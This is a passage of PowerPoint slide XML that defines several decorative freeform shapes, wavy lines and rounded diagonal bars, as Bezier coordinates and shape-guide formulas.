                <a:cubicBezTo>
                  <a:pt x="0" y="326"/>
                  <a:pt x="0" y="326"/>
                  <a:pt x="0" y="326"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="318"/>
                  <a:pt x="18" y="322"/>
                  <a:pt x="28" y="325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="38" y="328"/>
                  <a:pt x="47" y="331"/>
                  <a:pt x="53" y="325"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="319"/>
                  <a:pt x="56" y="310"/>
                  <a:pt x="53" y="300"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="50" y="290"/>
                  <a:pt x="47" y="279"/>
                  <a:pt x="54" y="272"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="62" y="264"/>
                  <a:pt x="73" y="267"/>
                  <a:pt x="83" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="92" y="274"/>
                  <a:pt x="101" y="276"/>
                  <a:pt x="107" y="271"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="265"/>
                  <a:pt x="111" y="255"/>
                  <a:pt x="108" y="246"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="104" y="236"/>
                  <a:pt x="101" y="225"/>
                  <a:pt x="109" y="217"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="116" y="210"/>
                  <a:pt x="127" y="213"/>
                  <a:pt x="137" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="147" y="219"/>
                  <a:pt x="156" y="222"/>
                  <a:pt x="162" y="216"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="210"/>
                  <a:pt x="165" y="201"/>
                  <a:pt x="162" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="159" y="181"/>
                  <a:pt x="155" y="171"/>
                  <a:pt x="163" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="171" y="155"/>
                  <a:pt x="181" y="159"/>
                  <a:pt x="192" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="201" y="165"/>
                  <a:pt x="210" y="168"/>
                  <a:pt x="216" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="156"/>
                  <a:pt x="219" y="147"/>
                  <a:pt x="216" y="137"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="213" y="127"/>
                  <a:pt x="210" y="116"/>
                  <a:pt x="217" y="109"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="225" y="101"/>
                  <a:pt x="236" y="104"/>
                  <a:pt x="246" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="256" y="110"/>
                  <a:pt x="265" y="113"/>
                  <a:pt x="271" y="107"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="277" y="101"/>
                  <a:pt x="274" y="92"/>
                  <a:pt x="271" y="83"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="267" y="72"/>
                  <a:pt x="264" y="62"/>
                  <a:pt x="272" y="54"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="279" y="47"/>
                  <a:pt x="290" y="50"/>
                  <a:pt x="300" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="56"/>
                  <a:pt x="319" y="59"/>
                  <a:pt x="325" y="53"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="331" y="47"/>
                  <a:pt x="328" y="38"/>
                  <a:pt x="325" y="28"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="322" y="18"/>
                  <a:pt x="318" y="7"/>
                  <a:pt x="326" y="0"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329" y="3"/>
                  <a:pt x="329" y="3"/>
                  <a:pt x="329" y="3"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="323" y="9"/>
                  <a:pt x="326" y="18"/>
                  <a:pt x="329" y="27"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="332" y="38"/>
                  <a:pt x="335" y="48"/>
                  <a:pt x="328" y="56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22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0A3978EE-87B3-408D-A91B-D0A36FF639A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4156075" y="5248275"/>
            <a:ext cx="657225" cy="654050"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 8 w 336"/>
              <a:gd name="T1" fmla="*/ 279 h 335"/>
              <a:gd name="T2" fmla="*/ 37 w 336"/>
              <a:gd name="T3" fmla="*/ 278 h 335"/>
              <a:gd name="T4" fmla="*/ 61 w 336"/>
              <a:gd name="T5" fmla="*/ 278 h 335"/>
              <a:gd name="T6" fmla="*/ 61 w 336"/>
              <a:gd name="T7" fmla="*/ 253 h 335"/>
              <a:gd name="T8" fmla="*/ 63 w 336"/>
              <a:gd name="T9" fmla="*/ 225 h 335"/>
              <a:gd name="T10" fmla="*/ 91 w 336"/>
              <a:gd name="T11" fmla="*/ 224 h 335"/>
              <a:gd name="T12" fmla="*/ 116 w 336"/>
              <a:gd name="T13" fmla="*/ 224 h 335"/>
              <a:gd name="T14" fmla="*/ 116 w 336"/>
              <a:gd name="T15" fmla="*/ 199 h 335"/>
              <a:gd name="T16" fmla="*/ 117 w 336"/>
              <a:gd name="T17" fmla="*/ 170 h 335"/>
              <a:gd name="T18" fmla="*/ 146 w 336"/>
              <a:gd name="T19" fmla="*/ 169 h 335"/>
              <a:gd name="T20" fmla="*/ 170 w 336"/>
              <a:gd name="T21" fmla="*/ 169 h 335"/>
              <a:gd name="T22" fmla="*/ 170 w 336"/>
              <a:gd name="T23" fmla="*/ 145 h 335"/>
              <a:gd name="T24" fmla="*/ 171 w 336"/>
              <a:gd name="T25" fmla="*/ 116 h 335"/>
              <a:gd name="T26" fmla="*/ 200 w 336"/>
              <a:gd name="T27" fmla="*/ 115 h 335"/>
              <a:gd name="T28" fmla="*/ 225 w 336"/>
              <a:gd name="T29" fmla="*/ 115 h 335"/>
              <a:gd name="T30" fmla="*/ 225 w 336"/>
              <a:gd name="T31" fmla="*/ 90 h 335"/>
              <a:gd name="T32" fmla="*/ 226 w 336"/>
              <a:gd name="T33" fmla="*/ 62 h 335"/>
              <a:gd name="T34" fmla="*/ 254 w 336"/>
              <a:gd name="T35" fmla="*/ 61 h 335"/>
              <a:gd name="T36" fmla="*/ 279 w 336"/>
              <a:gd name="T37" fmla="*/ 60 h 335"/>
              <a:gd name="T38" fmla="*/ 279 w 336"/>
              <a:gd name="T39" fmla="*/ 36 h 335"/>
              <a:gd name="T40" fmla="*/ 280 w 336"/>
              <a:gd name="T41" fmla="*/ 7 h 335"/>
              <a:gd name="T42" fmla="*/ 309 w 336"/>
              <a:gd name="T43" fmla="*/ 6 h 335"/>
              <a:gd name="T44" fmla="*/ 333 w 336"/>
              <a:gd name="T45" fmla="*/ 6 h 335"/>
              <a:gd name="T46" fmla="*/ 336 w 336"/>
              <a:gd name="T47" fmla="*/ 9 h 335"/>
              <a:gd name="T48" fmla="*/ 307 w 336"/>
              <a:gd name="T49" fmla="*/ 10 h 335"/>
              <a:gd name="T50" fmla="*/ 283 w 336"/>
              <a:gd name="T51" fmla="*/ 10 h 335"/>
              <a:gd name="T52" fmla="*/ 283 w 336"/>
              <a:gd name="T53" fmla="*/ 35 h 335"/>
              <a:gd name="T54" fmla="*/ 282 w 336"/>
              <a:gd name="T55" fmla="*/ 63 h 335"/>
              <a:gd name="T56" fmla="*/ 253 w 336"/>
              <a:gd name="T57" fmla="*/ 64 h 335"/>
              <a:gd name="T58" fmla="*/ 228 w 336"/>
              <a:gd name="T59" fmla="*/ 64 h 335"/>
              <a:gd name="T60" fmla="*/ 228 w 336"/>
              <a:gd name="T61" fmla="*/ 89 h 335"/>
              <a:gd name="T62" fmla="*/ 227 w 336"/>
              <a:gd name="T63" fmla="*/ 118 h 335"/>
              <a:gd name="T64" fmla="*/ 199 w 336"/>
              <a:gd name="T65" fmla="*/ 119 h 335"/>
              <a:gd name="T66" fmla="*/ 174 w 336"/>
              <a:gd name="T67" fmla="*/ 119 h 335"/>
              <a:gd name="T68" fmla="*/ 174 w 336"/>
              <a:gd name="T69" fmla="*/ 143 h 335"/>
              <a:gd name="T70" fmla="*/ 173 w 336"/>
              <a:gd name="T71" fmla="*/ 172 h 335"/>
              <a:gd name="T72" fmla="*/ 144 w 336"/>
              <a:gd name="T73" fmla="*/ 173 h 335"/>
              <a:gd name="T74" fmla="*/ 120 w 336"/>
              <a:gd name="T75" fmla="*/ 173 h 335"/>
              <a:gd name="T76" fmla="*/ 120 w 336"/>
              <a:gd name="T77" fmla="*/ 198 h 335"/>
              <a:gd name="T78" fmla="*/ 119 w 336"/>
              <a:gd name="T79" fmla="*/ 226 h 335"/>
              <a:gd name="T80" fmla="*/ 90 w 336"/>
              <a:gd name="T81" fmla="*/ 227 h 335"/>
              <a:gd name="T82" fmla="*/ 65 w 336"/>
              <a:gd name="T83" fmla="*/ 228 h 335"/>
              <a:gd name="T84" fmla="*/ 65 w 336"/>
              <a:gd name="T85" fmla="*/ 252 h 335"/>
              <a:gd name="T86" fmla="*/ 64 w 336"/>
              <a:gd name="T87" fmla="*/ 281 h 335"/>
              <a:gd name="T88" fmla="*/ 36 w 336"/>
              <a:gd name="T89" fmla="*/ 282 h 335"/>
              <a:gd name="T90" fmla="*/ 11 w 336"/>
              <a:gd name="T91" fmla="*/ 282 h 335"/>
              <a:gd name="T92" fmla="*/ 11 w 336"/>
              <a:gd name="T93" fmla="*/ 307 h 335"/>
              <a:gd name="T94" fmla="*/ 10 w 336"/>
              <a:gd name="T95" fmla="*/ 335 h 335"/>
              <a:gd name="T96" fmla="*/ 7 w 336"/>
              <a:gd name="T97" fmla="*/ 332 h 335"/>
              <a:gd name="T98" fmla="*/ 7 w 336"/>
              <a:gd name="T99" fmla="*/ 308 h 335"/>
              <a:gd name="T100" fmla="*/ 8 w 336"/>
              <a:gd name="T101" fmla="*/ 279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6" h="335">
                <a:moveTo>
                  <a:pt x="8" y="279"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="16" y="271"/>
                  <a:pt x="26" y="275"/>
                  <a:pt x="37" y="278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="46" y="281"/>
                  <a:pt x="55" y="284"/>
                  <a:pt x="61" y="278"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="67" y="272"/>
                  <a:pt x="64" y="263"/>
                  <a:pt x="61" y="253"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="58" y="243"/>
                  <a:pt x="55" y="232"/>
                  <a:pt x="63" y="225"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="70" y="217"/>
                  <a:pt x="81" y="220"/>
                  <a:pt x="91" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="101" y="227"/>
                  <a:pt x="110" y="230"/>
                  <a:pt x="116" y="224"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="122" y="218"/>
                  <a:pt x="119" y="209"/>
                  <a:pt x="116" y="199"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="113" y="189"/>
                  <a:pt x="109" y="178"/>
                  <a:pt x="117" y="170"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="125" y="163"/>
                  <a:pt x="135" y="166"/>
                  <a:pt x="146" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="155" y="172"/>
                  <a:pt x="164" y="175"/>
                  <a:pt x="170" y="169"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="176" y="163"/>
                  <a:pt x="173" y="154"/>
                  <a:pt x="170" y="145"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="167" y="134"/>
                  <a:pt x="164" y="124"/>
                  <a:pt x="171" y="116"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="179" y="108"/>
                  <a:pt x="190" y="112"/>
                  <a:pt x="200" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="209" y="118"/>
                  <a:pt x="219" y="121"/>
                  <a:pt x="225" y="115"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="230" y="109"/>
                  <a:pt x="228" y="100"/>
                  <a:pt x="225" y="90"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="221" y="80"/>
                  <a:pt x="218" y="69"/>
                  <a:pt x="226" y="62"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="233" y="54"/>
                  <a:pt x="244" y="57"/>
                  <a:pt x="254" y="61"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="264" y="64"/>
                  <a:pt x="273" y="66"/>
                  <a:pt x="279" y="60"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="285" y="55"/>
                  <a:pt x="282" y="45"/>
                  <a:pt x="279" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="276" y="26"/>
                  <a:pt x="272" y="15"/>
                  <a:pt x="280" y="7"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="288" y="0"/>
                  <a:pt x="298" y="3"/>
                  <a:pt x="309" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="318" y="9"/>
                  <a:pt x="327" y="12"/>
                  <a:pt x="333" y="6"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="336" y="9"/>
                  <a:pt x="336" y="9"/>
                  <a:pt x="336" y="9"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="17"/>
                  <a:pt x="318" y="13"/>
                  <a:pt x="307" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="298" y="7"/>
                  <a:pt x="289" y="4"/>
                  <a:pt x="283" y="10"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="277" y="16"/>
                  <a:pt x="280" y="25"/>
                  <a:pt x="283" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="286" y="45"/>
                  <a:pt x="289" y="56"/>
                  <a:pt x="282" y="63"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="274" y="71"/>
                  <a:pt x="263" y="68"/>
                  <a:pt x="253" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="243" y="61"/>
                  <a:pt x="234" y="58"/>
                  <a:pt x="228" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="222" y="70"/>
                  <a:pt x="225" y="79"/>
                  <a:pt x="228" y="89"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="232" y="99"/>
                  <a:pt x="235" y="110"/>
                  <a:pt x="227" y="118"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="220" y="125"/>
                  <a:pt x="209" y="122"/>
                  <a:pt x="199" y="119"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="189" y="116"/>
                  <a:pt x="180" y="113"/>
                  <a:pt x="174" y="119"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="168" y="125"/>
                  <a:pt x="171" y="134"/>
                  <a:pt x="174" y="143"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="177" y="154"/>
                  <a:pt x="181" y="164"/>
                  <a:pt x="173" y="172"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="165" y="180"/>
                  <a:pt x="155" y="176"/>
                  <a:pt x="144" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="135" y="170"/>
                  <a:pt x="126" y="167"/>
                  <a:pt x="120" y="173"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="114" y="179"/>
                  <a:pt x="117" y="188"/>
                  <a:pt x="120" y="198"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="123" y="208"/>
                  <a:pt x="126" y="219"/>
                  <a:pt x="119" y="226"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="111" y="234"/>
                  <a:pt x="100" y="231"/>
                  <a:pt x="90" y="227"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="224"/>
                  <a:pt x="71" y="222"/>
                  <a:pt x="65" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="59" y="233"/>
                  <a:pt x="62" y="243"/>
                  <a:pt x="65" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="68" y="262"/>
                  <a:pt x="72" y="273"/>
                  <a:pt x="64" y="281"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="57" y="288"/>
                  <a:pt x="46" y="285"/>
                  <a:pt x="36" y="282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="26" y="279"/>
                  <a:pt x="17" y="276"/>
                  <a:pt x="11" y="282"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="288"/>
                  <a:pt x="8" y="297"/>
                  <a:pt x="11" y="307"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="14" y="317"/>
                  <a:pt x="17" y="328"/>
                  <a:pt x="10" y="335"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="7" y="332"/>
                  <a:pt x="7" y="332"/>
                  <a:pt x="7" y="332"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="13" y="326"/>
                  <a:pt x="10" y="317"/>
                  <a:pt x="7" y="308"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="4" y="297"/>
                  <a:pt x="0" y="287"/>
                  <a:pt x="8" y="279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23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D1222072-1F11-445C-8937-1B50AC4A2A36}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6489700" y="1217613"/>
            <a:ext cx="1489075" cy="1487488"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 726 w 762"/>
              <a:gd name="T1" fmla="*/ 36 h 762"/>
              <a:gd name="T2" fmla="*/ 726 w 762"/>
              <a:gd name="T3" fmla="*/ 163 h 762"/>
              <a:gd name="T4" fmla="*/ 163 w 762"/>
              <a:gd name="T5" fmla="*/ 727 h 762"/>
              <a:gd name="T6" fmla="*/ 35 w 762"/>
              <a:gd name="T7" fmla="*/ 727 h 762"/>
              <a:gd name="T8" fmla="*/ 35 w 762"/>
              <a:gd name="T9" fmla="*/ 727 h 762"/>
              <a:gd name="T10" fmla="*/ 35 w 762"/>
              <a:gd name="T11" fmla="*/ 599 h 762"/>
              <a:gd name="T12" fmla="*/ 599 w 762"/>
              <a:gd name="T13" fmla="*/ 36 h 762"/>
              <a:gd name="T14" fmla="*/ 726 w 762"/>
              <a:gd name="T15" fmla="*/ 36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2" h="762">
                <a:moveTo>
                  <a:pt x="726" y="36"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="762" y="71"/>
                  <a:pt x="762" y="128"/>
                  <a:pt x="726" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163" y="727"/>
                  <a:pt x="163" y="727"/>
                  <a:pt x="163" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="762"/>
                  <a:pt x="70" y="762"/>
                  <a:pt x="35" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="727"/>
                  <a:pt x="35" y="727"/>
                  <a:pt x="35" y="727"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="692"/>
                  <a:pt x="0" y="635"/>
                  <a:pt x="35" y="599"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="599" y="36"/>
                  <a:pt x="599" y="36"/>
                  <a:pt x="599" y="36"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="634" y="0"/>
                  <a:pt x="691" y="0"/>
                  <a:pt x="726" y="36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24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAEFBC92-8563-4268-A0D7-DACDB774E884}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7683500" y="1422400"/>
            <a:ext cx="893763" cy="890588"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 422 w 457"/>
              <a:gd name="T1" fmla="*/ 35 h 456"/>
              <a:gd name="T2" fmla="*/ 422 w 457"/>
              <a:gd name="T3" fmla="*/ 162 h 456"/>
              <a:gd name="T4" fmla="*/ 163 w 457"/>
              <a:gd name="T5" fmla="*/ 421 h 456"/>
              <a:gd name="T6" fmla="*/ 35 w 457"/>
              <a:gd name="T7" fmla="*/ 421 h 456"/>
              <a:gd name="T8" fmla="*/ 35 w 457"/>
              <a:gd name="T9" fmla="*/ 421 h 456"/>
              <a:gd name="T10" fmla="*/ 35 w 457"/>
              <a:gd name="T11" fmla="*/ 294 h 456"/>
              <a:gd name="T12" fmla="*/ 294 w 457"/>
              <a:gd name="T13" fmla="*/ 35 h 456"/>
              <a:gd name="T14" fmla="*/ 422 w 457"/>
              <a:gd name="T15" fmla="*/ 35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7" h="456">
                <a:moveTo>
                  <a:pt x="422" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="457" y="70"/>
                  <a:pt x="457" y="127"/>
                  <a:pt x="422" y="162"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163" y="421"/>
                  <a:pt x="163" y="421"/>
                  <a:pt x="163" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="128" y="456"/>
                  <a:pt x="70" y="456"/>
                  <a:pt x="35" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="421"/>
                  <a:pt x="35" y="421"/>
                  <a:pt x="35" y="421"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="386"/>
                  <a:pt x="0" y="329"/>
                  <a:pt x="35" y="294"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="294" y="35"/>
                  <a:pt x="294" y="35"/>
                  <a:pt x="294" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="329" y="0"/>
                  <a:pt x="386" y="0"/>
                  <a:pt x="422" y="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25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44D3A99D-36E0-4BEF-B798-01AA6A81508C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4030663" y="1473200"/>
            <a:ext cx="1257300" cy="1257300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 608 w 643"/>
              <a:gd name="T1" fmla="*/ 35 h 644"/>
              <a:gd name="T2" fmla="*/ 608 w 643"/>
              <a:gd name="T3" fmla="*/ 163 h 644"/>
              <a:gd name="T4" fmla="*/ 163 w 643"/>
              <a:gd name="T5" fmla="*/ 609 h 644"/>
              <a:gd name="T6" fmla="*/ 35 w 643"/>
              <a:gd name="T7" fmla="*/ 609 h 644"/>
              <a:gd name="T8" fmla="*/ 35 w 643"/>
              <a:gd name="T9" fmla="*/ 609 h 644"/>
              <a:gd name="T10" fmla="*/ 35 w 643"/>
              <a:gd name="T11" fmla="*/ 481 h 644"/>
              <a:gd name="T12" fmla="*/ 480 w 643"/>
              <a:gd name="T13" fmla="*/ 35 h 644"/>
              <a:gd name="T14" fmla="*/ 608 w 643"/>
              <a:gd name="T15" fmla="*/ 35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3" h="644">
                <a:moveTo>
                  <a:pt x="608" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="643" y="71"/>
                  <a:pt x="643" y="128"/>
                  <a:pt x="608" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="163" y="609"/>
                  <a:pt x="163" y="609"/>
                  <a:pt x="163" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="644"/>
                  <a:pt x="70" y="644"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="573"/>
                  <a:pt x="0" y="516"/>
                  <a:pt x="35" y="481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516" y="0"/>
                  <a:pt x="573" y="0"/>
                  <a:pt x="608" y="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Freeform 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44BC6767-1009-4621-B230-D913B56BD39F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6821488" y="4119563"/>
            <a:ext cx="1257300" cy="1257300"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 608 w 643"/>
              <a:gd name="T1" fmla="*/ 35 h 644"/>
              <a:gd name="T2" fmla="*/ 608 w 643"/>
              <a:gd name="T3" fmla="*/ 163 h 644"/>
              <a:gd name="T4" fmla="*/ 162 w 643"/>
              <a:gd name="T5" fmla="*/ 609 h 644"/>
              <a:gd name="T6" fmla="*/ 35 w 643"/>
              <a:gd name="T7" fmla="*/ 609 h 644"/>
              <a:gd name="T8" fmla="*/ 35 w 643"/>
              <a:gd name="T9" fmla="*/ 609 h 644"/>
              <a:gd name="T10" fmla="*/ 35 w 643"/>
              <a:gd name="T11" fmla="*/ 481 h 644"/>
              <a:gd name="T12" fmla="*/ 480 w 643"/>
              <a:gd name="T13" fmla="*/ 35 h 644"/>
              <a:gd name="T14" fmla="*/ 608 w 643"/>
              <a:gd name="T15" fmla="*/ 35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3" h="644">
                <a:moveTo>
                  <a:pt x="608" y="35"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="643" y="71"/>
                  <a:pt x="643" y="128"/>
                  <a:pt x="608" y="163"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="162" y="609"/>
                  <a:pt x="162" y="609"/>
                  <a:pt x="162" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="127" y="644"/>
                  <a:pt x="70" y="644"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                  <a:pt x="35" y="609"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="573"/>
                  <a:pt x="0" y="516"/>
                  <a:pt x="35" y="481"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                  <a:pt x="480" y="35"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="516" y="0"/>
                  <a:pt x="573" y="0"/>
                  <a:pt x="608" y="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Freeform 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
